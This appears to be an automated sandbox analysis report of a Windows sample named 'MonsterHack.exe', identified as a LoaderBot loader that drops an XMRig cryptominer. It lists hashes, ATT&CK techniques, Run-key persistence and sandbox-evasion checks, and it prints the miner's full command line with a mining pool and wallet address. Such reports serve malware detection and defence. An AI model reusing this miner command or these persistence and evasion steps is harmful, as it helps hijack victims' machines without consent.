Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-06-2024 11:50

General

  • Target

    MonsterHack.exe

  • Size

    4.0MB

  • MD5

    6efea760737c914276321712b7c5faf0

  • SHA1

    cac227707c574deba24c71c85e64e0da1e246b11

  • SHA256

    6952e0e1fc7847b46473a9f22ba352a06623f966e08bb6f79a8b189a117e1510

  • SHA512

    f60077d79a205a78ca86dbd32072604298e2df14dbbc96c94561765289aaeb79123b5fe747e9dcda8289682c57805b9449c67f21f10f4b2453abf09b0ac88561

  • SSDEEP

    49152:5NDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3:vzP88fBsnZTgOtqB3m1RC3

Malware Config

Signatures

  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • LoaderBot executable 1 IoCs
  • XMRig Miner payload 8 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MonsterHack.exe
    "C:\Users\Admin\AppData\Local\Temp\MonsterHack.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: RenamesItself
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4172
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2940
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:932
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2332
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2052
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Drops startup file
    • Checks SCSI registry key(s)
    • Checks processor information in registry
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:4652
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:856

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    Peripheral Device Discovery

    1
    T1120

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url
      Filesize

      177B

      MD5

      0473c18c4bc6cfc88f19ff1061cece56

      SHA1

      be986ef447d98e159ee859873a819e2ee06e3496

      SHA256

      1e5612f63f74dab7254a065d622a84c5460d9367dcdce5d5be0fe6845fa6b30c

      SHA512

      0da901255204e68da702194ade25c84079fcdda5bc9ae9bd320fd8f85efd9052a467b9ecca70eb46cb378cba1916296de0ce783ca9050fab2eef1bb6e37d5989

    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      Filesize

      3.9MB

      MD5

      02569a7a91a71133d4a1023bf32aa6f4

      SHA1

      0f16bcb3f3f085d3d3be912195558e9f9680d574

      SHA256

      8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

      SHA512

      534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

    • memory/932-22-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/2052-49-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/2052-48-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/2052-47-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/2052-46-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/2052-45-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/2332-38-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/2940-18-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/2940-15-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/2940-17-0x0000000001FC0000-0x0000000001FD4000-memory.dmp
      Filesize

      80KB

    • memory/4172-39-0x0000000074D3E000-0x0000000074D3F000-memory.dmp
      Filesize

      4KB

    • memory/4172-1-0x00000000002A0000-0x000000000069E000-memory.dmp
      Filesize

      4.0MB

    • memory/4172-4-0x0000000005230000-0x0000000005296000-memory.dmp
      Filesize

      408KB

    • memory/4172-5-0x0000000074D30000-0x00000000754E0000-memory.dmp
      Filesize

      7.7MB

    • memory/4172-41-0x0000000074D30000-0x00000000754E0000-memory.dmp
      Filesize

      7.7MB

    • memory/4172-0-0x0000000074D3E000-0x0000000074D3F000-memory.dmp
      Filesize

      4KB

    • memory/4652-35-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp
      Filesize

      4KB

    • memory/4652-26-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp
      Filesize

      4KB

    • memory/4652-31-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp
      Filesize

      4KB

    • memory/4652-32-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp
      Filesize

      4KB

    • memory/4652-33-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp
      Filesize

      4KB

    • memory/4652-34-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp
      Filesize

      4KB

    • memory/4652-25-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp
      Filesize

      4KB

    • memory/4652-36-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp
      Filesize

      4KB

    • memory/4652-37-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp
      Filesize

      4KB

    • memory/4652-27-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp
      Filesize

      4KB